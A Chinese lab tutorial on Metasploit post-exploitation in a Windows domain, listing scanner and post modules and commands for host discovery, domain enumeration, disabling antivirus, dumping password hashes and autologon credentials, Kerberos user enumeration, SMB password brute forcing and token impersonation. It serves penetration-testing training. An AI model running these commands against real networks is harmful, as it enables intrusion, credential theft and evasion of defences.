文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
MSF后渗透之域信息收集
当我们设置全局代理,那么就可以在MSF中使用模块来对10段进行扫描:
常用的模块:
auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机,这不能通过代理使用
auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口
auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描,默认扫描1-10000端口
auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
auxiliary/scanner/ftp/ftp_version #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title #探测内网http服务的标题
auxiliary/scanner/smb/smb_version #发现内网smb服务,基于默认的445端口
auxiliary/scanner/mssql/mssql_schemadump #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname
我们这里就挑smb的来进行扫描:
use auxiliary/scanner/smb/smb_version #选择攻击模块
set rhost 10.10.10.0/24 #设置网段
set THREADS 20 #设置线程
从图中我们是可以看出是存在域环境的。
但我们发现是域环境时,则可以利用模块来进行信息收集:
首先通过进程迁移到域用户权限:
migrate PID
run post/windows/gather/enum_logged_on_users #查看登录过的用户信息
run post/windows/gather/enum_ad_groups #查看组信息
run post/windows/gather/enum_domain #定位域控
run post/windows/gather/enum_ad_computers #域内所有机器
run post/windows/gather/enum_patches #发现缺失的补丁
run post/multi/recon/local_exploit_suggester #快速识别可能被利用的漏洞
run post/windows/manage/migrate #自动进程迁移
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav #关闭杀毒软件
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/manage/autoroute #查看路由信息
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run post/windows/gather/enum_applications #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump #dump出所有用户的hash
run post/windows/gather/enum_domain_tokens #寻找域token
使用常用模块进行域内信息收集:
获取登陆用户的SID:
获取域控信息及域内主机信息:
获取域token:
获取域用户的hash:(需要管理员权限)
通过从上面的信息收集,我们可以对域内用户进行枚举:
通过提示语来进行判断是否存在,required表示存在
use auxiliary/gather/kerberos_enumusers
set DOMAIN redteam.club
set RHOSTS 10.10.10.142
set USER_FILE 用户名字典
枚举后,则可以使用密码来进行尝试爆破:
use auxiliary/scanner/smb/smb_login #密码爆破
由于这个模块爆破三次,就会锁定,所以我们明智的方法就是使用一个密码:
假设已经获取了明文密码,则可以用来进行爆破:
出了我们可以使用进程迁移,同样我们可以使用假冒令牌登陆:
load incognito #加载
list_tokens -u #列出当前系统可用的token
impersonate_token 'NT AUTHORITY\SYSTEM' #假冒system
这里如果没有加载,则会提示你先进行load,如果已进行加载,这同样会提示。
这里同样可以假冒域用户的权限:
steal_token窃取令牌:主要通过ps查看pid值,来进行窃取:
使用drop_token则可以返回原始权限,和假冒令牌中的rev2self作用一样。
但窃取令牌是不能窃取域用户的,假冒和迁移是可以使用域用户的token和进程。
但两者的区别在于: 假冒可以退回原始权限,而迁移后,是不能退回原始权限。
前者假冒后不能使用getuid,而后者可以使用。
5286
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
